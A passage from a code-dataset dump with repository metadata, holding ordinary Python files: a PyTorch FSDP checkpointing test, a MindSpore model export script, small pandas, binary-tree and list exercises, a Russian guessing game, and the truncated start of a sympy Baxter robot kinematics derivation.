\"Intel\"\n]"},"max_stars_count":{"kind":"number","value":5,"string":"5"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2018-04-24T13:41:12.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2019-07-09T07:32:09.000Z"},"max_issues_repo_path":{"kind":"string","value":"test/distributed/fsdp/test_fsdp_checkpoint.py"},"max_issues_repo_name":{"kind":"string","value":"vuanvin/pytorch"},"max_issues_repo_head_hexsha":{"kind":"string","value":"9267fd8d7395074001ad7cf2a8f28082dbff6b0b"},"max_issues_repo_licenses":{"kind":"list like","value":["Intel"],"string":"[\n \"Intel\"\n]"},"max_issues_count":{"kind":"number","value":14,"string":"14"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2021-10-14T06:58:50.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2021-12-17T11:51:07.000Z"},"max_forks_repo_path":{"kind":"string","value":"test/distributed/fsdp/test_fsdp_checkpoint.py"},"max_forks_repo_name":{"kind":"string","value":"vuanvin/pytorch"},"max_forks_repo_head_hexsha":{"kind":"string","value":"9267fd8d7395074001ad7cf2a8f28082dbff6b0b"},"max_forks_repo_licenses":{"kind":"list like","value":["Intel"],"string":"[\n \"Intel\"\n]"},"max_forks_count":{"kind":"number","value":7,"string":"7"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2020-08-31T22:49:59.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2020-09-15T14:29:07.000Z"},"content":{"kind":"string","value":"# Owner(s): [\"oncall: distributed\"]\n\nimport contextlib\nfrom copy import deepcopy\nfrom functools import partial\n\nimport torch\nimport torch.nn as nn\nfrom torch.distributed._fsdp.fully_sharded_data_parallel import (\n FullyShardedDataParallel as FSDP,\n CPUOffload,\n)\nfrom torch.distributed.algorithms._checkpoint._checkpoint_wrapper import (\n checkpoint_wrapper,\n)\nfrom torch.testing._internal.common_distributed import (\n skip_if_lt_x_gpu,\n)\nfrom torch.testing._internal.common_fsdp import (\n FSDPTest,\n _maybe_wrap_fsdp,\n)\nfrom torch.testing._internal.common_utils import (\n run_tests,\n parametrize,\n instantiate_parametrized_tests,\n)\nfrom torch.utils.checkpoint import checkpoint\n\n\nclass TestFSDPCheckpoint(FSDPTest):\n class SequentialModule(nn.Module):\n def __init__(\n self,\n checkpoint_layer=False,\n offload_activations=False,\n wrap_fsdp=False,\n *fsdp_args,\n **fsdp_kwargs,\n ):\n torch.manual_seed(0)\n torch.cuda.manual_seed(0)\n super().__init__()\n l1 = nn.Linear(3, 3).cuda()\n l2 = nn.Linear(3, 3).cuda()\n l3 = nn.Linear(3, 3).cuda()\n\n if checkpoint_layer:\n ckpt_wrapper = partial(\n checkpoint_wrapper, offload_to_cpu=offload_activations\n )\n\n l1 = ckpt_wrapper(l1)\n l2 = ckpt_wrapper(l2)\n l3 = ckpt_wrapper(l3)\n\n fsdp_wrapper = partial(\n _maybe_wrap_fsdp, wrap_fsdp=wrap_fsdp, *fsdp_args, **fsdp_kwargs\n )\n self.ffn = nn.Sequential(\n fsdp_wrapper(l1),\n fsdp_wrapper(l2),\n fsdp_wrapper(l3),\n )\n\n def forward(self, x):\n return self.ffn(x)\n\n def _verify_parity(self, losses, outputs, models):\n assert losses\n assert outputs\n assert models\n\n for (l, o) in zip(losses[1:], outputs[1:]):\n self.assertEqual(losses[0], l)\n self.assertEqual(outputs[0], o)\n\n # Verify grads\n ref_model = models[0]\n ref_grads = [p.grad for p in ref_model.parameters()]\n for m in models[1:]:\n grads = [p.grad for p in m.parameters()]\n for ref_g, g in zip(ref_grads, grads):\n self.assertEqual(ref_g, g)\n\n @skip_if_lt_x_gpu(2)\n @parametrize(\n \"cpu_offload\",\n [CPUOffload(offload_params=True), CPUOffload(offload_params=False)],\n )\n @parametrize(\"offload_activations\", [True, False])\n def test_checkpoint_fsdp_wrapping(self, cpu_offload, offload_activations):\n # Test checkpoint(FSDP(layer1), FSDP(layer2), ....)\n ckpt_sequential_wrapped_fsdp = checkpoint_wrapper(\n TestFSDPCheckpoint.SequentialModule(\n wrap_fsdp=True, cpu_offload=cpu_offload\n ),\n offload_to_cpu=offload_activations,\n )\n # Test FSDP(checkpoint(layer1)), FSDP(checkpoint(layer2)), ....\n inner_ckpt = TestFSDPCheckpoint.SequentialModule(\n checkpoint_layer=True,\n offload_activations=offload_activations,\n wrap_fsdp=True,\n cpu_offload=cpu_offload,\n )\n\n baseline = TestFSDPCheckpoint.SequentialModule(\n wrap_fsdp=True, cpu_offload=cpu_offload\n )\n\n # note that reentrant-based checkpointing requires inputs to have grad\n # flag set.\n inp = torch.randn(10, 3, device=torch.cuda.current_device(), requires_grad=True)\n\n models = [ckpt_sequential_wrapped_fsdp, inner_ckpt, baseline]\n\n offload_to_cpu_event = \"Memcpy DtoH\"\n\n for i in range(2):\n losses = []\n outputs = []\n for m in models:\n check_offload = m != baseline and i == 0 and offload_activations\n profiler_ctx = (\n torch.profiler.profile(use_cuda=True)\n if check_offload\n else contextlib.suppress()\n )\n with profiler_ctx as prof:\n out = m(inp)\n\n if check_offload:\n event_names = [event.name for event in prof.events()]\n offload_occured = any(\n offload_to_cpu_event in name for name in event_names\n )\n self.assertTrue(offload_occured)\n loss = out.sum()\n loss.backward()\n losses.append(loss)\n outputs.append(out)\n\n self._verify_parity(losses, outputs, models)\n\n @skip_if_lt_x_gpu(2)\n @parametrize(\n \"cpu_offload\",\n [CPUOffload(offload_params=True), CPUOffload(offload_params=False)],\n )\n @parametrize(\"offload_activations\", [True, False])\n def test_basic_checkpoint_end_to_end(self, cpu_offload, offload_activations):\n seq = TestFSDPCheckpoint.SequentialModule().to(torch.cuda.current_device())\n # Runs FSDP with no checkpointing\n fsdp_only_seq = FSDP(deepcopy(seq), cpu_offload=cpu_offload)\n # Runs checkpoint-wrapped FSDP\n checkpointed_fsdp = checkpoint_wrapper(\n FSDP(deepcopy(seq), cpu_offload=cpu_offload),\n offload_to_cpu=offload_activations,\n )\n # Runs FSDP-wrapped checkpointed module\n fsdp_wrapped_checkpoint = FSDP(\n checkpoint_wrapper(deepcopy(seq), offload_to_cpu=offload_activations),\n cpu_offload=cpu_offload,\n )\n # Runs FSDP with manual calls to checkpoint.\n fsdp_call_checkpoint = FSDP(deepcopy(seq), cpu_offload=cpu_offload)\n # note that reentrant-based checkpointing requires inputs to have grad\n # flag set.\n\n inp = torch.randn(10, 3, device=torch.cuda.current_device(), requires_grad=True)\n\n models = [\n fsdp_only_seq,\n checkpointed_fsdp,\n fsdp_wrapped_checkpoint,\n fsdp_call_checkpoint,\n ]\n\n offload_to_cpu_event = \"Memcpy DtoH\"\n\n for i in range(6):\n losses = []\n outputs = []\n for m in models:\n check_offload = m != fsdp_only_seq and i == 0 and offload_activations\n profiler_ctx = (\n torch.profiler.profile(use_cuda=True)\n if check_offload\n else contextlib.suppress()\n )\n with profiler_ctx as prof:\n if m == fsdp_call_checkpoint:\n offload_ctx = (\n torch.autograd.graph.save_on_cpu(pin_memory=True)\n if offload_activations\n else contextlib.suppress()\n )\n with offload_ctx:\n out = checkpoint(m, inp)\n else:\n out = m(inp)\n\n if check_offload:\n event_names = [event.name for event in prof.events()]\n offload_occured = any(\n offload_to_cpu_event in name for name in event_names\n )\n self.assertTrue(offload_occured)\n loss = out.sum()\n loss.backward()\n losses.append(loss)\n outputs.append(out)\n\n self._verify_parity(losses, outputs, models)\n\ninstantiate_parametrized_tests(TestFSDPCheckpoint)\n\nif __name__ == \"__main__\":\n run_tests()\n"},"avg_line_length":{"kind":"number","value":34.1900452489,"string":"34.190045"},"max_line_length":{"kind":"number","value":88,"string":"88"},"alphanum_fraction":{"kind":"number","value":0.5717310746,"string":"0.571731"}}},{"rowIdx":46390,"cells":{"hexsha":{"kind":"string","value":"f7913068c3042169ee6c413f8ef205e68a9963ab"},"size":{"kind":"number","value":2716,"string":"2,716"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"research/cv/arcface/modelarts/export.py"},"max_stars_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_stars_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_stars_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_stars_count":{"kind":"number","value":77,"string":"77"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:37.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-30T13:09:11.000Z"},"max_issues_repo_path":{"kind":"string","value":"research/cv/arcface/modelarts/export.py"},"max_issues_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_issues_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_issues_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_issues_count":{"kind":"number","value":3,"string":"3"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2021-10-30T14:44:57.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-02-14T06:57:57.000Z"},"max_forks_repo_path":{"kind":"string","value":"research/cv/arcface/modelarts/export.py"},"max_forks_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_forks_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_forks_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_forks_count":{"kind":"number","value":24,"string":"24"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:45.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-24T18:45:20.000Z"},"content":{"kind":"string","value":"# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"\npython start.py\n\"\"\"\nimport os\nimport glob\nimport argparse\nimport numpy as np\nfrom mindspore import export\nfrom mindspore import Tensor\nfrom mindspore.train.serialization import load_checkpoint, load_param_into_net\nfrom src.iresnet import iresnet100\n\nDATA_PATH = \"/cache/data_path_\"\nCKPT_PATH = \"/cache/ckpt/\"\n\nparser = argparse.ArgumentParser(description='Mindspore ImageNet Training')\nparser.add_argument('--train_url', default='', type=str,\n help='output path')\nparser.add_argument('--data_url', default='', type=str)\n# Datasets\nparser.add_argument('--batch_size', default=1, type=int, metavar='N',\n help='train batchsize (default: 256)')\n\nparser.add_argument('--modelarts', type=bool, default=True)\nargs = parser.parse_args()\n\n\ndef frozen_to_air(modelnet, modelargs):\n param_dict = load_checkpoint(modelargs.get(\"ckpt_file\"))\n load_param_into_net(modelnet, param_dict)\n\n input_arr = Tensor(\n np.zeros([modelargs.get(\"batch_size\"), 3, modelargs.get(\"height\"), modelargs.get(\"width\")], np.float32))\n export(modelnet, input_arr, file_name=modelargs.get(\"file_name\"), file_format=modelargs.get(\"file_format\"))\n\n\nif __name__ == \"__main__\":\n import moxing as mox\n\n if not os.path.exists(DATA_PATH):\n os.makedirs(DATA_PATH, 0o755)\n mox.file.copy_parallel(src_url=args.data_url, dst_url=CKPT_PATH)\n prefix = \"ArcFace\"\n ckpt_list = glob.glob(CKPT_PATH + prefix + \"*.ckpt\")\n if not ckpt_list:\n print(\"ckpt file not generated.\")\n\n ckpt_list.sort(key=os.path.getmtime)\n ckpt_model = ckpt_list[-1]\n net = iresnet100()\n frozen_to_air_args = {'ckpt_file': ckpt_model,\n 'batch_size': args.batch_size,\n 'height': 112,\n 'width': 112,\n 'file_name': (CKPT_PATH + prefix),\n 'file_format': 'AIR'}\n frozen_to_air(net, frozen_to_air_args)\n\n if args.modelarts:\n mox.file.copy_parallel(src_url=CKPT_PATH, dst_url=args.train_url)\n"},"avg_line_length":{"kind":"number","value":36.2133333333,"string":"36.213333"},"max_line_length":{"kind":"number","value":112,"string":"112"},"alphanum_fraction":{"kind":"number","value":0.6704712813,"string":"0.670471"}}},{"rowIdx":46391,"cells":{"hexsha":{"kind":"string","value":"540d424532ff9f498d7d0a5c8cc540f93970db70"},"size":{"kind":"number","value":713,"string":"713"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Python/pandas/01_series.py"},"max_stars_repo_name":{"kind":"string","value":"Kreijeck/learning"},"max_stars_repo_head_hexsha":{"kind":"string","value":"eaffee08e61f2a34e01eb8f9f04519aac633f48c"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"Python/pandas/01_series.py"},"max_issues_repo_name":{"kind":"string","value":"Kreijeck/learning"},"max_issues_repo_head_hexsha":{"kind":"string","value":"eaffee08e61f2a34e01eb8f9f04519aac633f48c"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"Python/pandas/01_series.py"},"max_forks_repo_name":{"kind":"string","value":"Kreijeck/learning"},"max_forks_repo_head_hexsha":{"kind":"string","value":"eaffee08e61f2a34e01eb8f9f04519aac633f48c"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"import pandas as pd\nimport numpy as np\n\ndata = [22, 33, 41, 12]\nindex = [\"A\", \"B\", \"C\", \"D\"]\ns = pd.Series(data, name='Age', index=index)\nprint(s)\nprint(s[\"B\"])\nprint(s[2])\n\ndata_dict = {\n \"A\": 28,\n \"B\": 42,\n \"C\": 1337,\n \"D\": 43,\n}\n\n# index kann gesetzt werden und ändert auch die Reihenfolge und werte können\n# wiederholt werden\ns2 = pd.Series(data_dict, index=[\"A\", 'B', 'D', 'E', 'C', 'A'])\nprint(s2)\n\n#unnützer datatype wird zurückgesetzt\ns3 = pd.Series(np.random.randn(10), dtype=np.int32)\nprint(s3)\ns3 = pd.Series(np.random.randint(12, 25, 10), dtype=np.int32)\nprint(s3)\n\n# Achtun slice: nicht möglich: s[1:3][0], da index beibehalten wird\n\n# Filtern\nprint(s3[s3 < s3.mean()])\nprint(np.log(s3))\n"},"avg_line_length":{"kind":"number","value":20.9705882353,"string":"20.970588"},"max_line_length":{"kind":"number","value":76,"string":"76"},"alphanum_fraction":{"kind":"number","value":0.6325385694,"string":"0.632539"}}},{"rowIdx":46392,"cells":{"hexsha":{"kind":"string","value":"54a5a39aa2099d456ab0d02ac4fb47014ac0ba69"},"size":{"kind":"number","value":1400,"string":"1,400"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Problems/Depth-First Search/easy/MinimumAbsoluteDifferenceBST/min_abs_dif_bst.py"},"max_stars_repo_name":{"kind":"string","value":"dolong2110/Algorithm-By-Problems-Python"},"max_stars_repo_head_hexsha":{"kind":"string","value":"31ecc7367aaabdd2b0ac0af7f63ca5796d70c730"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-08-16T14:52:05.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2021-08-16T14:52:05.000Z"},"max_issues_repo_path":{"kind":"string","value":"Problems/Depth-First Search/easy/MinimumAbsoluteDifferenceBST/min_abs_dif_bst.py"},"max_issues_repo_name":{"kind":"string","value":"dolong2110/Algorithm-By-Problems-Python"},"max_issues_repo_head_hexsha":{"kind":"string","value":"31ecc7367aaabdd2b0ac0af7f63ca5796d70c730"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"Problems/Depth-First Search/easy/MinimumAbsoluteDifferenceBST/min_abs_dif_bst.py"},"max_forks_repo_name":{"kind":"string","value":"dolong2110/Algorithm-By-Problems-Python"},"max_forks_repo_head_hexsha":{"kind":"string","value":"31ecc7367aaabdd2b0ac0af7f63ca5796d70c730"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"from typing import Optional\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n# Recursive Magic\n# def getMinimumDifference(self, root: Optional[TreeNode]) -> int:\n# def get_min_dif(node, low, high):\n# if not node:\n# return high - low\n#\n# left = get_min_dif(node.left, low, node.val)\n# right = get_min_dif(node.right, node.val, high)\n#\n# return min(left, right)\n#\n# return get_min_dif(root, float('-inf'), float('inf'))\n\n# Recursive Inorder DFS\n# def getMinimumDifference(self, root: Optional[TreeNode]) -> int:\n# sorted_list = []\n#\n# def dfs(node: Optional[TreeNode]):\n# if node.left:\n# dfs(node.left)\n#\n# sorted_list.append(node.val)\n# if node.right:\n# dfs(node.right)\n#\n# dfs(root)\n# return min(b - a for a, b in zip(sorted_list, sorted_list[1:]))\n\n# Recursive inorder DFS\ndef getMinimumDifference(self, root: Optional[TreeNode]) -> int:\n sorted_list = []\n\n def dfs(node):\n if node.left: dfs(node.left)\n sorted_list.append(node.val)\n if node.right: dfs(node.right)\n\n dfs(root)\n\n res = float('inf')\n for i in range(1, len(sorted_list)):\n res = min(res, sorted_list[i] - sorted_list[i - 1])\n\n return res"},"avg_line_length":{"kind":"number","value":25.9259259259,"string":"25.925926"},"max_line_length":{"kind":"number","value":69,"string":"69"},"alphanum_fraction":{"kind":"number","value":0.6014285714,"string":"0.601429"}}},{"rowIdx":46393,"cells":{"hexsha":{"kind":"string","value":"49c2612eb15938f0206a41d0a6921f4dfbb8879e"},"size":{"kind":"number","value":679,"string":"679"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"IVTp/2014/TITOV_S_G/task_6_22.py"},"max_stars_repo_name":{"kind":"string","value":"YukkaSarasti/pythonintask"},"max_stars_repo_head_hexsha":{"kind":"string","value":"eadf4245abb65f4400a3bae30a4256b4658e009c"},"max_stars_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"IVTp/2014/TITOV_S_G/task_6_22.py"},"max_issues_repo_name":{"kind":"string","value":"YukkaSarasti/pythonintask"},"max_issues_repo_head_hexsha":{"kind":"string","value":"eadf4245abb65f4400a3bae30a4256b4658e009c"},"max_issues_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"IVTp/2014/TITOV_S_G/task_6_22.py"},"max_forks_repo_name":{"kind":"string","value":"YukkaSarasti/pythonintask"},"max_forks_repo_head_hexsha":{"kind":"string","value":"eadf4245abb65f4400a3bae30a4256b4658e009c"},"max_forks_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"# Задача 6. Вариант 22.\n# Создайте игру, в которой компьютер загадывает имена двух братьев, легендарных основателей Рима, а игрок должен его угадать.\n\n# Titov S.G.\n# 11.04.2016\n\nimport random\n\nprint (\"Программа случайным образом загадывает имена двух братьев, легендарных основателей Рима, а игрок должен его угадать.\")\n\nname_numbers = random.randint (1,2)\n\nif name_numbers == 1 :\n name = 'Ромул'\nelif name_numbers == 2 :\n name = 'Рем'\n\nanswer = input (\"Назовите одно из имен, легендарных основателей Рима: \")\n\nif answer == name:\n print ('\\nВы угадали!')\nelse :\n print ('\\nВы не угадали!')\n print ('Правильный ответ:', name)\n\ninput (\"\\nНажмите Enter для выхода.\")\n"},"avg_line_length":{"kind":"number","value":25.1481481481,"string":"25.148148"},"max_line_length":{"kind":"number","value":126,"string":"126"},"alphanum_fraction":{"kind":"number","value":0.70544919,"string":"0.705449"}}},{"rowIdx":46394,"cells":{"hexsha":{"kind":"string","value":"b72419d65127bf209e857f63197e4e47f112db09"},"size":{"kind":"number","value":1198,"string":"1,198"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"basics/lists.py"},"max_stars_repo_name":{"kind":"string","value":"karinakozarova/Learning-Python"},"max_stars_repo_head_hexsha":{"kind":"string","value":"217dfc8ca6931a238445daf0b84e188c02916c52"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2019-04-07T23:14:29.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2019-04-07T23:14:29.000Z"},"max_issues_repo_path":{"kind":"string","value":"basics/lists.py"},"max_issues_repo_name":{"kind":"string","value":"karinakozarova/Learning-Python"},"max_issues_repo_head_hexsha":{"kind":"string","value":"217dfc8ca6931a238445daf0b84e188c02916c52"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"basics/lists.py"},"max_forks_repo_name":{"kind":"string","value":"karinakozarova/Learning-Python"},"max_forks_repo_head_hexsha":{"kind":"string","value":"217dfc8ca6931a238445daf0b84e188c02916c52"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"from sys import stdin\nimport re\n\"\"\"\nThe first line contains an integer,N , denoting the number of commands.\nEach line of the subsequent lines contains one of the commands:\n insert i e: Insert integer at position .\n print: Print the list.\n remove e: Delete the first occurrence of integer .\n append e: Insert integer at the end of the list.\n sort: Sort the list.\n pop: Pop the last element from the list.\n reverse: Reverse the list.\n\"\"\"\n\ndef input_to_list(userinput):\n return re.sub(\"[^\\w]\", \" \", userinput).split()\n\nif __name__ == '__main__':\n N = int(input())\n list = []\n\n for i in range(0,N):\n userinput = stdin.readline()\n wordList = input_to_list(userinput)\n\n if \"insert\" == wordList[0]:\n list.insert(int(wordList[1]),int(wordList[2]))\n elif \"print\" in userinput:\n print(list)\n elif \"remove\" in userinput:\n list.remove(int(wordList[1]))\n elif \"append\" in userinput:\n list.append(int(wordList[1]))\n elif \"sort\" in userinput:\n list.sort()\n elif \"pop\" in userinput:\n list.pop()\n elif \"reverse\" in userinput:\n list.reverse()"},"avg_line_length":{"kind":"number","value":30.7179487179,"string":"30.717949"},"max_line_length":{"kind":"number","value":71,"string":"71"},"alphanum_fraction":{"kind":"number","value":0.6051752922,"string":"0.605175"}}},{"rowIdx":46395,"cells":{"hexsha":{"kind":"string","value":"3fcb65dba04aa41adca62639fb1dc876d15cd06f"},"size":{"kind":"number","value":19338,"string":"19,338"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"misc/sympy_play/baxter_kinema_sympy.py"},"max_stars_repo_name":{"kind":"string","value":"YoshimitsuMatsutaIe/hoge_flow_test"},"max_stars_repo_head_hexsha":{"kind":"string","value":"22e2e2ce043a3107bd06449f6f9958641293e414"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"misc/sympy_play/baxter_kinema_sympy.py"},"max_issues_repo_name":{"kind":"string","value":"YoshimitsuMatsutaIe/hoge_flow_test"},"max_issues_repo_head_hexsha":{"kind":"string","value":"22e2e2ce043a3107bd06449f6f9958641293e414"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"misc/sympy_play/baxter_kinema_sympy.py"},"max_forks_repo_name":{"kind":"string","value":"YoshimitsuMatsutaIe/hoge_flow_test"},"max_forks_repo_head_hexsha":{"kind":"string","value":"22e2e2ce043a3107bd06449f6f9958641293e414"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"\"\"\"baxterロボの同時変換行列などをsympyで式展開し整理\n・左腕のみ\n\"\"\"\n\nimport sympy as sy\nimport math\nfrom sympy.printing.pycode import pycode\n\nt_independent = False\n\n\nL, h, H = sy.symbols(\"L, h, H\")\nL0, L1, L2, L3, L4, L5, L6 = sy.symbols(\"L0, L1, L2, L3, L4, L5, L6\")\n\n\n\nif t_independent:\n q1, q2, q3, q4, q5, q6, q7 = sy.symbols(\"q1, q2, q3, q4, q5, q6, q7\")\n c0 = sy.cos(sy.pi / 4)\n s0 = sy.sin(sy.pi / 4)\n c1 = sy.cos(q1)\n s1 = sy.sin(q1)\n c2 = sy.cos(q2)\n s2 = sy.sin(q2)\n c3 = sy.cos(q3)\n s3 = sy.sin(q3)\n c4 = sy.cos(q4)\n s4 = sy.sin(q4)\n c5 = sy.cos(q5)\n s5 = sy.sin(q5)\n c6 = sy.cos(q6)\n s6 = sy.sin(q6)\n c7 = sy.cos(q7)\n s7 = sy.sin(q7)\n # ジョイント角度ベクトル\n q = sy.Matrix([[q1, q2, q3, q4, q5, q6, q7]]).T\n\n\nif not t_independent:\n ### qを時間の関数にしたいとき ###\n t = sy.Symbol(\"t\")\n c0 = sy.cos(sy.pi / 4)\n s0 = sy.sin(sy.pi / 4)\n q1 = sy.Function(\"q1\")\n q2 = sy.Function(\"q2\")\n q3 = sy.Function(\"q3\")\n q4 = sy.Function(\"q4\")\n q5 = sy.Function(\"q5\")\n q6 = sy.Function(\"q6\")\n q7 = sy.Function(\"q7\")\n c1 = sy.cos(q1(t))\n s1 = sy.sin(q1(t))\n c2 = sy.cos(q2(t))\n s2 = sy.sin(q2(t))\n c3 = sy.cos(q3(t))\n s3 = sy.sin(q3(t))\n c4 = sy.cos(q4(t))\n s4 = sy.sin(q4(t))\n c5 = sy.cos(q5(t))\n s5 = sy.sin(q5(t))\n c6 = sy.cos(q6(t))\n s6 = sy.sin(q6(t))\n c7 = sy.cos(q7(t))\n s7 = sy.sin(q7(t))\n\n # ジョイント角度ベクトル\n q = sy.Matrix([[q1(t), q2(t), q3(t), q4(t), q5(t), q6(t), q7(t)]]).T\n\n\n\n\n# 同時変換行列\n\n# 直書き\n# T_Wo_BL = sy.Matrix([[math.sqrt(2) / 2, math.sqrt(2) / 2, 0, L],\n# [-math.sqrt(2) / 2, math.sqrt(2) / 2, 0, -h],\n# [0, 0, 1, H],\n# [0, 0, 0, 1]])\n\n# 直書きじゃない\nT_Wo_BL = sy.Matrix([[c0, s0, 0, L],\n [-s0, c0, 0, -h],\n [0, 0, 1, H],\n [0, 0, 0, 1]])\n\nT_BL_0 = sy.Matrix([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, L0],\n [0, 0, 0, 1]])\n\nT_0_1 = sy.Matrix([[c1, -s1, 0, 0],\n [s1, c1, 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]])\n\nT_1_2 = sy.Matrix([[-s2, -c2, 0, L1],\n [0, 0, 1, 0],\n [-c2, s2, 0, 0],\n [0, 0, 0, 1]])\n\nT_2_3 = sy.Matrix([[c3, -s3, 0, 0],\n [0, 0, -1, -L2],\n [s3, c3, 0, 0],\n [0, 0, 0, 1]])\n\nT_3_4 = sy.Matrix([[c4, -s4, 0, L3],\n [0, 